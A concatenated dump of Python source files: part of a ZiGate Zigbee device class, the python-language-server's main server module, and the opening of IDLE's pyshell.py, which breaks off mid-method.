self._lock_release()
return self.endpoints[endpoint_id]
def get_cluster(self, endpoint_id, cluster_id):
endpoint = self.get_endpoint(endpoint_id)
self._lock_acquire()
if cluster_id not in endpoint['clusters']:
cluster = get_cluster(cluster_id, endpoint, self)
endpoint['clusters'][cluster_id] = cluster
self._lock_release()
return endpoint['clusters'][cluster_id]
    def set_attribute(self, endpoint_id, cluster_id, data):
        """
        Store an incoming attribute report and dispatch change signals.

        data: dict with at least 'attribute' and 'data' keys, plus an
        optional 'lqi'.  Returns (added, attribute_id) when the cluster
        stored the value, or None when the report was dropped or
        delayed by the fast-change debouncer.
        """
        added = False
        lqi = data.pop('lqi', 0)
        if lqi > 0:
            # a real radio message: refresh link quality and liveness
            self.info['lqi'] = lqi
        self.info['last_seen'] = strftime('%Y-%m-%d %H:%M:%S')
        self.missing = False
        # delay fast change for cluster 0x0006
        if DETECT_FASTCHANGE and cluster_id == 0x0006 and data['attribute'] == 0x0000:
            now = monotonic()
            k = (endpoint_id, cluster_id, data['attribute'])
            last_change = self._fast_change.setdefault(k, 0)
            self._fast_change[k] = now
            if (now - last_change) < DELAY_FASTCHANGE:
                LOGGER.debug('Fast change detected, delay it for %s %s %s', endpoint_id, cluster_id, data)
                self._delay_change(endpoint_id, cluster_id, data)
                return
        cluster = self.get_cluster(endpoint_id, cluster_id)
        self._lock_acquire()
        r = cluster.update(data)
        if r:
            added, attribute = r
            # attributes flagged with 'expire' reset themselves later
            if 'expire' in attribute:
                self._set_expire_timer(endpoint_id, cluster_id,
                                       attribute['attribute'],
                                       attribute['expire'])
            self._avoid_duplicate()
        self._lock_release()
        if not r:
            return
        changed = self.get_attribute(endpoint_id,
                                     cluster_id,
                                     attribute['attribute'], True)
        # basic cluster attribute 5 is the model identifier: (re)load
        # the matching template the first time it appears
        if cluster_id == 0 and attribute['attribute'] == 5:
            if not self.discovery:
                self.load_template()
        if added:
            dispatch_signal(ZIGATE_ATTRIBUTE_ADDED, self._zigate,
                            **{'zigate': self._zigate,
                               'device': self,
                               'attribute': changed})
        else:
            dispatch_signal(ZIGATE_ATTRIBUTE_UPDATED, self._zigate,
                            **{'zigate': self._zigate,
                               'device': self,
                               'attribute': changed})
        self._handle_quirks(changed)
        return added, attribute['attribute']
    def _handle_quirks(self, attribute):
        """
        Handle special attributes.

        Currently decodes the packed 'xiaomi' attribute: its value is a
        mapping whose numeric keys carry the real sensor readings,
        which are re-injected as standard cluster attributes through
        set_attribute.  Key meanings below follow observed xiaomi
        reports.
        """
        if 'name' not in attribute:
            return
        if attribute['name'] == 'xiaomi':
            LOGGER.debug('Handle special xiaomi attribute %s', attribute)
            values = attribute['value']
            # Battery voltage
            data_map = [(0x01, 0x0001, 0x0020, values[1] / 100.),]
            # TODO: Handle more special attribute
            if self.get_type(False) == 'lumi.sensor_motion.aq2':
                # occupancy + illuminance
                data_map += [(0x01, 0x0406, 0x0000, values[100]),
                             (0x01, 0x0400, 0x0000, values[11])
                             ]
            elif self.get_type(False) == 'lumi.sensor_magnet.aq2':
                # open/close state
                data_map += [(0x01, 0x0006, 0x0000, values[100]),
                             ]
            elif self.get_type(False) == 'lumi.sensor_ht':
                # temperature + humidity
                data_map += [(0x01, 0x0402, 0x0000, values[100]),
                             (0x01, 0x0405, 0x0000, values[101]),
                             ]
            elif self.get_type(False) == 'lumi.weather':
                # temperature + humidity + pressure (whole and tenths)
                data_map += [(0x01, 0x0402, 0x0000, values[100]),
                             (0x01, 0x0405, 0x0000, values[101]),
                             (0x01, 0x0403, 0x0000, int(values[102] / 100)),
                             (0x01, 0x0403, 0x0010, values[102] / 10),
                             ]
            elif self.get_type(False) == 'lumi.ctrl_neutral1':
                data_map += [(0x02, 0x0006, 0x0000, values[100]),
                             ]
            elif self.get_type(False) == 'lumi.ctrl_neutral2':
                data_map += [(0x02, 0x0006, 0x0000, values[100]),
                             (0x03, 0x0006, 0x0000, values[101]),
                             ]
            for endpoint_id, cluster_id, attribute_id, value in data_map:
                self.set_attribute(endpoint_id, cluster_id, {'attribute': attribute_id, 'data': value})
def _delay_change(self, endpoint_id, cluster_id, data):
'''
Delay attribute change
'''
timer = threading.Timer(DELAY_FASTCHANGE * 2,
functools.partial(self.set_attribute,
endpoint_id,
cluster_id,
data))
timer.setDaemon(True)
timer.start()
def _set_expire_timer(self, endpoint_id, cluster_id, attribute_id, expire):
LOGGER.debug('Set expire timer for %s-%s-%s in %s', endpoint_id,
cluster_id,
attribute_id,
expire)
k = (endpoint_id, cluster_id, attribute_id)
timer = self._expire_timer.get(k)
if timer:
LOGGER.debug('Cancel previous Timer %s', timer)
timer.cancel()
timer = threading.Timer(expire,
functools.partial(self._reset_attribute,
endpoint_id,
cluster_id,
attribute_id))
timer.setDaemon(True)
timer.start()
self._expire_timer[k] = timer
def _reset_attribute(self, endpoint_id, cluster_id, attribute_id):
attribute = self.get_attribute(endpoint_id,
cluster_id,
attribute_id)
value = attribute['value']
if 'expire_value' in attribute:
new_value = attribute['expire_value']
elif 'type' in attribute:
new_value = attribute['type']()
else:
new_value = type(value)()
attribute['value'] = new_value
attribute['data'] = new_value
attribute = self.get_attribute(endpoint_id,
cluster_id,
attribute_id,
True)
dispatch_signal(ZIGATE_ATTRIBUTE_UPDATED, self._zigate,
**{'zigate': self._zigate,
'device': self,
'attribute': attribute})
def get_attribute(self, endpoint_id, cluster_id, attribute_id,
extended_info=False):
if endpoint_id in self.endpoints:
endpoint = self.endpoints[endpoint_id]
if cluster_id in endpoint['clusters']:
cluster = endpoint['clusters'][cluster_id]
attribute = cluster.get_attribute(attribute_id)
if extended_info:
attr = {'endpoint': endpoint_id,
'cluster': cluster_id,
'addr': self.addr}
attr.update(attribute)
return attr
return attribute
@property
def attributes(self):
'''
list all attributes including endpoint and cluster id
'''
return self.get_attributes(True)
def get_attributes(self, extended_info=False):
'''
list all attributes
including endpoint and cluster id
'''
attrs = []
endpoints = list(self.endpoints.keys())
endpoints.sort()
for endpoint_id in endpoints:
endpoint = self.endpoints[endpoint_id]
for cluster_id, cluster in endpoint.get('clusters', {}).items():
for attribute in cluster.attributes.values():
if extended_info:
attr = {'endpoint': endpoint_id, 'cluster': cluster_id}
attr.update(attribute)
attrs.append(attr)
else:
attrs.append(attribute)
return attrs
def set_attributes(self, attributes):
    """Load a list previously produced by the `attributes` property.

    Note: pops 'endpoint' and 'cluster' out of each entry in place.
    """
    for entry in attributes:
        ep_id = entry.pop('endpoint')
        cl_id = entry.pop('cluster')
        self.set_attribute(ep_id, cl_id, entry)
def get_property(self, name, extended_info=False):
    """Return the first attribute whose 'name' matches, else None.

    With extended_info the result is a new dict that also carries
    'endpoint' and 'cluster'.
    """
    for endpoint_id, endpoint in self.endpoints.items():
        for cluster_id, cluster in endpoint.get('clusters', {}).items():
            for attribute in cluster.attributes.values():
                if attribute.get('name') != name:
                    continue
                if not extended_info:
                    return attribute
                found = {'endpoint': endpoint_id,
                         'cluster': cluster_id}
                found.update(attribute)
                return found
def get_property_value(self, name, default=None):
    """Return the 'value' of the attribute matching name, else default."""
    prop = self.get_property(name)
    return prop.get('value', default) if prop else default
def get_value(self, name, default=None):
    """Shorter alias of get_property_value()."""
    return self.get_property_value(name, default)
@property
def properties(self):
    """The 'well known' attributes: those carrying a friendly 'name'."""
    named = []
    for endpoint in self.endpoints.values():
        for cluster in endpoint.get('clusters', {}).values():
            named.extend(a for a in cluster.attributes.values()
                         if 'name' in a)
    return named
def receiver_on_when_idle(self):
    """True when the mac_capability bitstring flags an always-on receiver.

    The flag is the third character from the end of the string; an
    absent/empty mac_capability counts as False.
    """
    mac_capability = self.info.get('mac_capability')
    if not mac_capability:
        return False
    return mac_capability[-3] == '1'
def need_discovery(self):
    """Return True when key device information is missing.

    Checks the device type, IEEE address, the presence of endpoints and,
    per endpoint, the device id and cluster list.  Also loads the device
    template first if no discovery has happened yet.
    """
    LOGGER.debug('Check Need discovery %s', self)
    if not self.discovery:
        self.load_template()
    required = False
    if not self.get_property_value('type'):
        LOGGER.debug('Need discovery : no type')
        required = True
    if not self.ieee:
        LOGGER.debug('Need discovery : no IEEE')
        required = True
    if not self.endpoints:
        LOGGER.debug('Need discovery : no endpoints')
        required = True
    for endpoint in self.endpoints.values():
        if endpoint.get('device') is None:
            LOGGER.debug('Need discovery : no device id')
            required = True
        if endpoint.get('in_clusters') is None:
            LOGGER.debug('Need discovery : no clusters list')
            required = True
    return required
def _avoid_duplicate(self):
    """Rename attributes in place so that no two share the same name.

    A duplicate gets its endpoint id appended, and the rename is
    propagated to the stored attribute dict as well.
    """
    seen = []
    for attribute in self.attributes:
        if 'name' not in attribute:
            continue
        if attribute['name'] in seen:
            attribute['name'] = '{}{}'.format(attribute['name'],
                                              attribute['endpoint'])
            stored = self.get_attribute(attribute['endpoint'],
                                        attribute['cluster'],
                                        attribute['attribute'])
            stored['name'] = attribute['name']
        seen.append(attribute['name'])
def __get_template_filename(self):
    """Derive the template file base name for this device.

    Prefer the sanitized type (modelIdentifier); otherwise build a name
    from the manufacturer code plus one 'endpoint-profile-device' part
    per endpoint.  Return None when neither source is available.
    """
    typ = self.get_type()
    if typ and typ != 'unsupported':
        return typ.replace(' ', '_').replace('/', '_')
    manufacturer_code = self.info.get('manufacturer_code')
    if not manufacturer_code:
        return None
    parts = ['{}'.format(manufacturer_code)]
    for endpoint_id, endpoint in self.endpoints.items():
        parts.append('_{}-{}-{}'.format(endpoint_id,
                                        endpoint.get('profile'),
                                        endpoint.get('device')))
    return ''.join(parts)
def has_template(self):
    """Tell whether a JSON template file exists for this device.

    Returns None (after a warning) when no template filename can be
    derived, True/False otherwise.
    """
    template_filename = self.__get_template_filename()
    if not template_filename:
        LOGGER.warning('Neither type (modelIdentifier) nor manufacturer_code for device {}'.format(self.addr))
        return
    candidate = os.path.join(BASE_PATH, 'templates', template_filename + '.json')
    return os.path.exists(candidate)
def load_template(self):
    """Load and apply the JSON template matching this device.

    Returns True on success, False when the file is missing or fails to
    parse, and None (after a warning) when no template filename can be
    derived.  Re-binds attribute reporting in any case, and dispatches
    ZIGATE_DEVICE_UPDATED only on success.
    """
    template_filename = self.__get_template_filename()
    if not template_filename:
        LOGGER.warning('Neither type (modelIdentifier) nor manufacturer_code for device {}'.format(self.addr))
        return
    path = os.path.join(BASE_PATH, 'templates', template_filename + '.json')
    success = False
    LOGGER.debug('Try loading template %s', path)
    if os.path.exists(path):
        try:
            with open(path) as fp:
                template = json.load(fp)
                device = Device.from_json(template)
                self.update(device)
                success = True
        except Exception:
            # Broad catch: a malformed template must never break startup.
            LOGGER.error('Failed to load template for {}'.format(template_filename))
            LOGGER.error(traceback.format_exc())
    else:
        LOGGER.info('No template found for {}'.format(template_filename))
    # Reporting is (re)bound even when the template failed to load.
    if self.need_report:
        self._bind_report()
    if success:
        self.discovery = 'templated'
        dispatch_signal(ZIGATE_DEVICE_UPDATED,
                        self._zigate, **{'zigate': self._zigate,
                                         'device': self})
    return success
def generate_template(self, dirname='~'):
    '''
    Generate template file

    Serializes the device through DeviceEncoder, strips all
    device-instance-specific data (addr, discovery, ids, link quality,
    buffers) and all attribute values, then writes the result as
    <template_filename>.json into *dirname* (user-expanded).
    '''
    template_filename = self.__get_template_filename()
    if not template_filename:
        LOGGER.warning('Neither type (modelIdentifier) nor manufacturer_code for device {}'.format(self.addr))
        return
    dirname = os.path.expanduser(dirname)
    path = os.path.join(dirname, template_filename + '.json')
    # Round-trip through JSON to get a plain-dict copy we can edit freely.
    jdata = json.dumps(self, cls=DeviceEncoder)
    jdata = json.loads(jdata)
    del jdata['addr']
    del jdata['discovery']
    for key in ('id', 'addr', 'ieee', 'lqi', 'last_seen', 'max_rx', 'max_tx', 'max_buffer'):
        if key in jdata['info']:
            del jdata['info'][key]
    for endpoint in jdata.get('endpoints', []):
        for cluster in endpoint.get('clusters', []):
            cluster_id = cluster['cluster']
            if cluster_id == 0:  # we only keep attribute 4, 5, 7 for cluster 0x0000
                cluster['attributes'] = [a for a in cluster.get('attributes', [])
                                         if a.get('attribute') in (4, 5, 7)]
            # Strip everything except the attribute id, the 'inverse' flag
            # and (for cluster 0 only) the raw 'data'.
            for attribute in cluster.get('attributes', []):
                keys = list(attribute.keys())
                for key in keys:
                    if key in ('attribute', 'inverse'):
                        continue
                    if key == 'data' and cluster_id == 0:
                        continue
                    del attribute[key]
    with open(path, 'w') as fp:
        json.dump(jdata, fp, cls=DeviceEncoder,
                  sort_keys=True, indent=4, separators=(',', ': '))
@property
def need_report(self):
    """Whether attribute reporting should be bound; defaults to True."""
    return self.info.get('need_report', True)
def set_assumed_state(self, assumed_state=True):
    """Record in the device info whether its state is assumed."""
    self.info['assumed_state'] = assumed_state
@property
def assumed_state(self):
    """True when the device state is assumed rather than reported."""
    return self.info.get('assumed_state', False)
@property
def groups(self):
    """Groups this device belongs to (delegated to the owning ZiGate)."""
    return self._zigate.get_group_for_addr(self.addr)
|
python_ls.py | # Copyright 2017 Palantir Technologies, Inc.
import logging
import socketserver
import threading
from jsonrpc.dispatchers import MethodDispatcher
from jsonrpc.endpoint import Endpoint
from jsonrpc.streams import JsonRpcStreamReader, JsonRpcStreamWriter
from . import lsp, _utils, uris
from .config import config
from .workspace import Workspace
log = logging.getLogger(__name__)
LINT_DEBOUNCE_S = 0.5 # 500 ms
PARENT_PROCESS_WATCH_INTERVAL = 10 # 10 s
MAX_WORKERS = 64
class _StreamHandlerWrapper(socketserver.StreamRequestHandler, object):
    """A wrapper class that is used to construct a custom handler class."""

    delegate = None

    def setup(self):
        super(_StreamHandlerWrapper, self).setup()
        # DELEGATE_CLASS is injected by start_tcp_lang_server via type().
        # pylint: disable=no-member
        self.delegate = self.DELEGATE_CLASS(self.rfile, self.wfile)

    def handle(self):
        # Run the delegated language server until its stream closes.
        self.delegate.start()
def start_tcp_lang_server(bind_addr, port, handler_class):
    """Serve handler_class over TCP on (bind_addr, port) until interrupted."""
    if not issubclass(handler_class, PythonLanguageServer):
        raise ValueError('Handler class must be an instance of PythonLanguageServer')

    # Build a request-handler type on the fly that delegates each
    # connection to a fresh instance of the user's handler_class.
    wrapper_class = type(
        handler_class.__name__ + 'Handler',
        (_StreamHandlerWrapper,),
        {'DELEGATE_CLASS': handler_class}
    )

    server = socketserver.TCPServer((bind_addr, port), wrapper_class)
    try:
        log.info('Serving %s on (%s, %s)', handler_class.__name__, bind_addr, port)
        server.serve_forever()
    finally:
        log.info('Shutting down')
        server.server_close()
def start_io_lang_server(rfile, wfile, check_parent_process, handler_class):
    """Run handler_class as a language server over the given I/O streams."""
    if not issubclass(handler_class, PythonLanguageServer):
        raise ValueError('Handler class must be an instance of PythonLanguageServer')
    log.info('Starting %s IO language server', handler_class.__name__)
    handler_class(rfile, wfile, check_parent_process).start()
class PythonLanguageServer(MethodDispatcher):
    """ Implementation of the Microsoft VSCode Language Server Protocol
    https://github.com/Microsoft/language-server-protocol/blob/master/versions/protocol-1-x.md

    JSON-RPC methods are handled by ``m_<name>`` methods (``/`` becomes
    ``__``), resolved through MethodDispatcher's __getitem__ protocol.
    """
    # pylint: disable=too-many-public-methods,redefined-builtin

    def __init__(self, rx, tx, check_parent_process=False):
        self.workspace = None
        self.config = None
        self._jsonrpc_stream_reader = JsonRpcStreamReader(rx)
        self._jsonrpc_stream_writer = JsonRpcStreamWriter(tx)
        self._check_parent_process = check_parent_process
        self._endpoint = Endpoint(self, self._jsonrpc_stream_writer.write, max_workers=MAX_WORKERS)
        self._dispatchers = []
        self._shutdown = False

    def start(self):
        """Entry point for the server."""
        self._jsonrpc_stream_reader.listen(self._endpoint.consume)

    def __getitem__(self, item):
        """Override getitem to fallback through multiple dispatchers."""
        if self._shutdown and item != 'exit':
            # exit is the only allowed method during shutdown
            log.debug("Ignoring non-exit method during shutdown: %s", item)
            raise KeyError

        try:
            return super(PythonLanguageServer, self).__getitem__(item)
        except KeyError:
            # Fallback through extra dispatchers
            for dispatcher in self._dispatchers:
                try:
                    return dispatcher[item]
                except KeyError:
                    continue
            raise KeyError()

    def m_shutdown(self, **_kwargs):
        """Flag shutdown; from now on only the 'exit' method is served."""
        self._shutdown = True
        return None

    def m_exit(self, **_kwargs):
        """Shut down the endpoint and close both JSON-RPC streams."""
        self._endpoint.shutdown()
        self._jsonrpc_stream_reader.close()
        self._jsonrpc_stream_writer.close()

    def _hook(self, hook_name, doc_uri=None, **kwargs):
        """Calls hook_name and returns a list of results from all registered handlers"""
        doc = self.workspace.get_document(doc_uri) if doc_uri else None
        hook_handlers = self.config.plugin_manager.subset_hook_caller(hook_name, self.config.disabled_plugins)
        return hook_handlers(config=self.config, workspace=self.workspace, document=doc, **kwargs)

    def capabilities(self):
        """Assemble the ServerCapabilities advertised during initialize."""
        server_capabilities = {
            'codeActionProvider': True,
            'codeLensProvider': {
                'resolveProvider': False,  # We may need to make this configurable
            },
            'completionProvider': {
                'resolveProvider': False,  # We know everything ahead of time
                'triggerCharacters': ['.']
            },
            'documentFormattingProvider': True,
            'documentHighlightProvider': True,
            'documentRangeFormattingProvider': True,
            'documentSymbolProvider': True,
            'definitionProvider': True,
            'executeCommandProvider': {
                'commands': flatten(self._hook('pyls_commands'))
            },
            'hoverProvider': True,
            'referencesProvider': True,
            'renameProvider': True,
            'signatureHelpProvider': {
                'triggerCharacters': ['(', ',']
            },
            'textDocumentSync': lsp.TextDocumentSyncKind.INCREMENTAL,
            'experimental': merge(self._hook('pyls_experimental_capabilities'))
        }
        log.info('Server capabilities: %s', server_capabilities)
        return server_capabilities

    def m_initialize(self, processId=None, rootUri=None, rootPath=None, initializationOptions=None, **_kwargs):
        """Create workspace/config, run init hooks, optionally watch the parent."""
        log.debug('Language server initialized with %s %s %s %s', processId, rootUri, rootPath, initializationOptions)
        if rootUri is None:
            rootUri = uris.from_fs_path(rootPath) if rootPath is not None else ''
        self.workspace = Workspace(rootUri, self._endpoint)
        self.config = config.Config(rootUri, initializationOptions or {}, processId)
        self._dispatchers = self._hook('pyls_dispatchers')
        self._hook('pyls_initialize')

        if self._check_parent_process and processId is not None:
            def watch_parent_process(pid):
                # exit when the given pid is not alive
                if not _utils.is_process_alive(pid):
                    log.info("parent process %s is not alive", pid)
                    self.m_exit()
                    # BUG FIX: previously fell through here, logging
                    # "still alive" and rescheduling the timer even after
                    # exiting, so the watcher ran forever.
                    return
                log.debug("parent process %s is still alive", pid)
                threading.Timer(PARENT_PROCESS_WATCH_INTERVAL, watch_parent_process, args=[pid]).start()

            watching_thread = threading.Thread(target=watch_parent_process, args=(processId,))
            watching_thread.daemon = True
            watching_thread.start()

        # Get our capabilities
        return {'capabilities': self.capabilities()}

    def m_initialized(self, **_kwargs):
        pass

    # --- Feature implementations; each fans out to the plugin hooks. ---

    def code_actions(self, doc_uri, range, context):
        return flatten(self._hook('pyls_code_actions', doc_uri, range=range, context=context))

    def code_lens(self, doc_uri):
        return flatten(self._hook('pyls_code_lens', doc_uri))

    def completions(self, doc_uri, position):
        completions = self._hook('pyls_completions', doc_uri, position=position)
        return {
            'isIncomplete': False,
            'items': flatten(completions)
        }

    def definitions(self, doc_uri, position):
        return flatten(self._hook('pyls_definitions', doc_uri, position=position))

    def document_symbols(self, doc_uri):
        return flatten(self._hook('pyls_document_symbols', doc_uri))

    def execute_command(self, command, arguments):
        return self._hook('pyls_execute_command', command=command, arguments=arguments)

    def format_document(self, doc_uri):
        return self._hook('pyls_format_document', doc_uri)

    def format_range(self, doc_uri, range):
        return self._hook('pyls_format_range', doc_uri, range=range)

    def highlight(self, doc_uri, position):
        return flatten(self._hook('pyls_document_highlight', doc_uri, position=position)) or None

    def hover(self, doc_uri, position):
        return self._hook('pyls_hover', doc_uri, position=position) or {'contents': ''}

    @_utils.debounce(LINT_DEBOUNCE_S, keyed_by='doc_uri')
    def lint(self, doc_uri, is_saved):
        # Since we're debounced, the document may no longer be open
        if doc_uri in self.workspace.documents:
            self.workspace.publish_diagnostics(
                doc_uri,
                flatten(self._hook('pyls_lint', doc_uri, is_saved=is_saved)))

    def references(self, doc_uri, position, exclude_declaration):
        return flatten(self._hook(
            'pyls_references', doc_uri, position=position,
            exclude_declaration=exclude_declaration
        ))

    def rename(self, doc_uri, position, new_name):
        return self._hook('pyls_rename', doc_uri, position=position, new_name=new_name)

    def signature_help(self, doc_uri, position):
        return self._hook('pyls_signature_help', doc_uri, position=position)

    # --- JSON-RPC method handlers (thin adapters over the above). ---

    def m_text_document__did_close(self, textDocument=None, **_kwargs):
        self.workspace.rm_document(textDocument['uri'])

    def m_text_document__did_open(self, textDocument=None, **_kwargs):
        self.workspace.put_document(textDocument['uri'], textDocument['text'], version=textDocument.get('version'))
        self._hook('pyls_document_did_open', textDocument['uri'])
        self.lint(textDocument['uri'], is_saved=True)

    def m_text_document__did_change(self, contentChanges=None, textDocument=None, **_kwargs):
        for change in contentChanges:
            self.workspace.update_document(
                textDocument['uri'],
                change,
                version=textDocument.get('version')
            )
        self.lint(textDocument['uri'], is_saved=False)

    def m_text_document__did_save(self, textDocument=None, **_kwargs):
        self.lint(textDocument['uri'], is_saved=True)

    def m_text_document__code_action(self, textDocument=None, range=None, context=None, **_kwargs):
        return self.code_actions(textDocument['uri'], range, context)

    def m_text_document__code_lens(self, textDocument=None, **_kwargs):
        return self.code_lens(textDocument['uri'])

    def m_text_document__completion(self, textDocument=None, position=None, **_kwargs):
        return self.completions(textDocument['uri'], position)

    def m_text_document__definition(self, textDocument=None, position=None, **_kwargs):
        return self.definitions(textDocument['uri'], position)

    def m_text_document__document_highlight(self, textDocument=None, position=None, **_kwargs):
        return self.highlight(textDocument['uri'], position)

    def m_text_document__hover(self, textDocument=None, position=None, **_kwargs):
        return self.hover(textDocument['uri'], position)

    def m_text_document__document_symbol(self, textDocument=None, **_kwargs):
        return self.document_symbols(textDocument['uri'])

    def m_text_document__formatting(self, textDocument=None, _options=None, **_kwargs):
        # For now we're ignoring formatting options.
        return self.format_document(textDocument['uri'])

    def m_text_document__rename(self, textDocument=None, position=None, newName=None, **_kwargs):
        return self.rename(textDocument['uri'], position, newName)

    def m_text_document__range_formatting(self, textDocument=None, range=None, _options=None, **_kwargs):
        # Again, we'll ignore formatting options for now.
        return self.format_range(textDocument['uri'], range)

    def m_text_document__references(self, textDocument=None, position=None, context=None, **_kwargs):
        exclude_declaration = not context['includeDeclaration']
        return self.references(textDocument['uri'], position, exclude_declaration)

    def m_text_document__signature_help(self, textDocument=None, position=None, **_kwargs):
        return self.signature_help(textDocument['uri'], position)

    def m_workspace__did_change_configuration(self, settings=None):
        self.config.update((settings or {}).get('pyls', {}))
        for doc_uri in self.workspace.documents:
            self.lint(doc_uri, is_saved=False)

    def m_workspace__did_change_watched_files(self, **_kwargs):
        # Externally changed files may result in changed diagnostics
        for doc_uri in self.workspace.documents:
            self.lint(doc_uri, is_saved=False)

    def m_workspace__execute_command(self, command=None, arguments=None):
        return self.execute_command(command, arguments)
def flatten(list_of_lists):
    """Concatenate a list of lists into one flat list."""
    flat = []
    for sub in list_of_lists:
        flat.extend(sub)
    return flat
def merge(list_of_dicts):
    """Merge dicts left to right; keys from later dicts win."""
    combined = {}
    for mapping in list_of_dicts:
        combined.update(mapping)
    return combined
|
pyshell.py | #! /usr/bin/env python3
import sys
# When run as a script, register this module under its package name so a
# later "import idlelib.pyshell" resolves to the already-running module
# instead of importing a second copy.
if __name__ == "__main__":
    sys.modules['idlelib.pyshell'] = sys.modules['__main__']

try:
    from tkinter import *
except ImportError:
    print("** IDLE can't import Tkinter.\n"
          "Your Python may not be configured for Tk. **", file=sys.__stderr__)
    raise SystemExit(1)

# Valid arguments for the ...Awareness call below are defined in the following.
# https://msdn.microsoft.com/en-us/library/windows/desktop/dn280512(v=vs.85).aspx
if sys.platform == 'win32':
    try:
        import ctypes
        PROCESS_SYSTEM_DPI_AWARE = 1  # Int required.
        ctypes.OleDLL('shcore').SetProcessDpiAwareness(PROCESS_SYSTEM_DPI_AWARE)
    except (ImportError, AttributeError, OSError):
        # Missing ctypes or a pre-Windows-8.1 API: continue without
        # declaring DPI awareness.
        pass

import tkinter.messagebox as tkMessageBox

# Tcl/Tk 8.5 is the minimum supported; fail early with a dialog rather
# than with obscure Tk errors later on.
if TkVersion < 8.5:
    root = Tk()  # otherwise create root in main
    root.withdraw()
    from idlelib.run import fix_scaling
    fix_scaling(root)
    tkMessageBox.showerror("Idle Cannot Start",
                           "Idle requires tcl/tk 8.5+, not %s." % TkVersion,
                           parent=root)
    raise SystemExit(1)
from code import InteractiveInterpreter
import linecache
import os
import os.path
from platform import python_version
import re
import socket
import subprocess
from textwrap import TextWrapper
import threading
import time
import tokenize
import warnings
from idlelib.colorizer import ColorDelegator
from idlelib.config import idleConf
from idlelib import debugger
from idlelib import debugger_r
from idlelib.editor import EditorWindow, fixwordbreaks
from idlelib.filelist import FileList
from idlelib.outwin import OutputWindow
from idlelib import rpc
from idlelib.run import idle_formatwarning, StdInputFile, StdOutputFile
from idlelib.undo import UndoDelegator
HOST = '127.0.0.1' # python execution server on localhost loopback
PORT = 0 # someday pass in host, port for remote debug capability
# Override warnings module to write to warning_stream. Initialize to send IDLE
# internal warnings to the console. ScriptBinding.check_syntax() will
# temporarily redirect the stream to the shell window to display warnings when
# checking user's code.
warning_stream = sys.__stderr__ # None, at least on Windows, if no console.
def idle_showwarning(
        message, category, filename, lineno, file=None, line=None):
    """Show Idle-format warning (after replacing warnings.showwarning).

    The differences are the formatter called, the file=None replacement,
    which can be None, the capture of the consequence AttributeError,
    and the output of a hard-coded prompt.
    """
    target = file if file is not None else warning_stream
    try:
        target.write(idle_formatwarning(
            message, category, filename, lineno, line=line))
        target.write(">>> ")
    except (AttributeError, OSError):
        # The stream (probably __stderr__) is invalid; drop the warning.
        pass
# Original warnings.showwarning, saved while IDLE's replacement is active.
_warnings_showwarning = None

def capture_warnings(capture):
    "Replace warning.showwarning with idle_showwarning, or reverse."
    global _warnings_showwarning
    if capture:
        # Install only once; remember the original for later restoration.
        if _warnings_showwarning is None:
            _warnings_showwarning = warnings.showwarning
            warnings.showwarning = idle_showwarning
    elif _warnings_showwarning is not None:
        warnings.showwarning = _warnings_showwarning
        _warnings_showwarning = None
capture_warnings(True)
def extended_linecache_checkcache(filename=None,
                                  orig_checkcache=linecache.checkcache):
    """Extend linecache.checkcache to preserve the <pyshell#...> entries

    Rather than repeating the linecache code, patch it to save the
    <pyshell#...> entries, call the original linecache.checkcache()
    (skipping them), and then restore the saved entries.

    orig_checkcache is bound at definition time to the original
    method, allowing it to be patched.
    """
    cache = linecache.cache
    # Pull out every pseudo-file entry (key shaped like '<...>').
    shell_entries = {key: cache.pop(key) for key in list(cache)
                     if key[:1] + key[-1:] == '<>'}
    orig_checkcache(filename)
    cache.update(shell_entries)
# Patch linecache.checkcache():
linecache.checkcache = extended_linecache_checkcache
class PyShellEditorWindow(EditorWindow):
    "Regular text edit window in IDLE, supports breakpoints"

    def __init__(self, *args):
        # Line numbers carrying a breakpoint in this window.
        self.breakpoints = []
        EditorWindow.__init__(self, *args)
        self.text.bind("<<set-breakpoint-here>>", self.set_breakpoint_here)
        self.text.bind("<<clear-breakpoint-here>>", self.clear_breakpoint_here)
        self.text.bind("<<open-python-shell>>", self.flist.open_shell)

        #TODO: don't read/write this from/to .idlerc when testing
        self.breakpointPath = os.path.join(
            idleConf.userdir, 'breakpoints.lst')

        # whenever a file is changed, restore breakpoints
        def filename_changed_hook(old_hook=self.io.filename_change_hook,
                                  self=self):
            self.restore_file_breaks()
            old_hook()
        self.io.set_filename_change_hook(filename_changed_hook)
        if self.io.filename:
            self.restore_file_breaks()
        self.color_breakpoint_text()

    # Extra right-click menu entries for breakpoint handling.
    rmenu_specs = [
        ("Cut", "<<cut>>", "rmenu_check_cut"),
        ("Copy", "<<copy>>", "rmenu_check_copy"),
        ("Paste", "<<paste>>", "rmenu_check_paste"),
        (None, None, None),
        ("Set Breakpoint", "<<set-breakpoint-here>>", None),
        ("Clear Breakpoint", "<<clear-breakpoint-here>>", None)
    ]

    def color_breakpoint_text(self, color=True):
        "Turn colorizing of breakpoint text on or off"
        if self.io is None:
            # possible due to update in restore_file_breaks
            return
        if color:
            theme = idleConf.CurrentTheme()
            cfg = idleConf.GetHighlight(theme, "break")
        else:
            cfg = {'foreground': '', 'background': ''}
        self.text.tag_config('BREAK', cfg)

    def set_breakpoint(self, lineno):
        """Tag the given line as a breakpoint and tell the debugger, if any."""
        text = self.text
        filename = self.io.filename
        text.tag_add("BREAK", "%d.0" % lineno, "%d.0" % (lineno+1))
        try:
            self.breakpoints.index(lineno)
        except ValueError:  # only add if missing, i.e. do once
            self.breakpoints.append(lineno)
        try:    # update the subprocess debugger
            debug = self.flist.pyshell.interp.debugger
            debug.set_breakpoint_here(filename, lineno)
        except:  # but debugger may not be active right now....
            pass

    def set_breakpoint_here(self, event=None):
        """Set a breakpoint on the line holding the insert cursor."""
        text = self.text
        filename = self.io.filename
        if not filename:
            text.bell()
            return
        lineno = int(float(text.index("insert")))
        self.set_breakpoint(lineno)

    def clear_breakpoint_here(self, event=None):
        """Remove the breakpoint (tag, list entry, debugger) at the cursor."""
        text = self.text
        filename = self.io.filename
        if not filename:
            text.bell()
            return
        lineno = int(float(text.index("insert")))
        try:
            self.breakpoints.remove(lineno)
        except:
            pass
        text.tag_remove("BREAK", "insert linestart",\
                        "insert lineend +1char")
        try:
            debug = self.flist.pyshell.interp.debugger
            debug.clear_breakpoint_here(filename, lineno)
        except:
            pass

    def clear_file_breaks(self):
        """Drop every breakpoint in this window, including in the debugger."""
        if self.breakpoints:
            text = self.text
            filename = self.io.filename
            if not filename:
                text.bell()
                return
            self.breakpoints = []
            text.tag_remove("BREAK", "1.0", END)
            try:
                debug = self.flist.pyshell.interp.debugger
